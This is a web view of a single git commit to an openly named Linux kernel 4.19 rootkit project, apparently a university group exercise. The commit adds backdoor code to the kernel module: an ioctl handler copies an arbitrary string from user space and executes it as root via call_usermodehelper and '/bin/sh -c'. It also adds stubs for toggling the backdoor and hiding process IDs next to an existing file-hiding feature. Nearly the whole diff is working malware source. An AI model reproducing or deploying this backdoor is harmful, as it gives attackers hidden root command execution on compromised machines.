linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 57b6388d8cf52fbdff0ed1794603ef37ce96e48b
parent fa4cb153ac03e5df35f37e7a9464e680a3930b79
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 11:42:30 +0100

adds initial backdoor code

Diffstat:

Msrc/channel.c | 45+++++++++++++++++++++++++++++++++++++++++++++


Msrc/channel.h | 3+++


Msrc/ioctl.h | 3+++


Msrc/rkctl/rkctl.c | 5+++--


Msrc/rkctl/rkctl.h | 4++--


5 files changed, 56 insertions(+), 4 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -29,6 +29,9 @@ detect_channel(unsigned cmd)
     switch (cmd) {
     case G7_PING:     return (channel_t){ "PING",     handle_ping     };
     case G7_FILEHIDE: return (channel_t){ "FILEHIDE", handle_filehide };
+    case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
+    case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
+    case G7_HIDEPID:  return (channel_t){ "HIDEPID",  handle_hidepid  };
     }
 
     return (channel_t){ "unknown", NULL };
@@ -69,3 +72,45 @@ handle_filehide(unsigned long arg)
 
     return 0;
 }
+
+int
+handle_backdoor(unsigned long arg)
+{
+    char buf[BUFLEN];
+
+    if (!(const char *)arg)
+        return -ENOTTY;
+
+    copy_from_user(buf, (const char *)arg, BUFLEN);
+
+    char *argv[] = {
+        "/bin/sh",
+        "-c",
+        buf,
+        NULL
+    };
+
+    static char *envp[] = {
+        "HOME=/",
+        "TERM=linux",
+        "PATH=/sbin:/bin:/usr/sbin:/usr/bin",
+        NULL
+    };
+
+    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
+    return 0;
+}
+
+int
+handle_togglebd(unsigned long arg)
+{
+
+    return 0;
+}
+
+int
+handle_hidepid(unsigned long arg)
+{
+
+    return 0;
+}
diff --git a/src/channel.h b/src/channel.h
@@ -12,5 +12,8 @@ channel_t detect_channel(unsigned);
 // handlers
 int handle_ping(unsigned long);
 int handle_filehide(unsigned long);
+int handle_backdoor(unsigned long);
+int handle_togglebd(unsigned long);
+int handle_hidepid(unsigned long);
 
 #endif//_GROUP7_CHANNEL_H
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -6,5 +6,8 @@
 
 #define G7_PING _IOWR(G7_MAGIC_NUMBER, 0x0, char *)
 #define G7_FILEHIDE _IOR(G7_MAGIC_NUMBER, 0x1, char *)
+#define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x2, char *)
+#define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x3, char *)
+#define G7_HIDEPID _IOR(G7_MAGIC_NUMBER, 0x4, char *)
 
 #endif//_GROUP7_IOCTL_H
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -79,12 +79,13 @@ handle_filehide(void *arg)
 }
 
 int
-handle_backdoor_execve(void *arg)
+handle_backdoor(void *arg)
 {
+    return issue_ioctl(G7_BACKDOOR, (const char *)arg);
 }
 
 int
-handle_backdoor_toggle(void *arg)
+handle_togglebd(void *arg)
 {
 }
 
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -22,8 +22,8 @@ void help();
 
 int handle_ping(void *);
 int handle_filehide(void *);
-int handle_backdoor_execve(void *);
-int handle_backdoor_toggle(void *);
+int handle_backdoor(void *);
+int handle_togglebd(void *);
 int handle_hidepid(void *);
 
 #endif//_GROUP7_RKCTL_H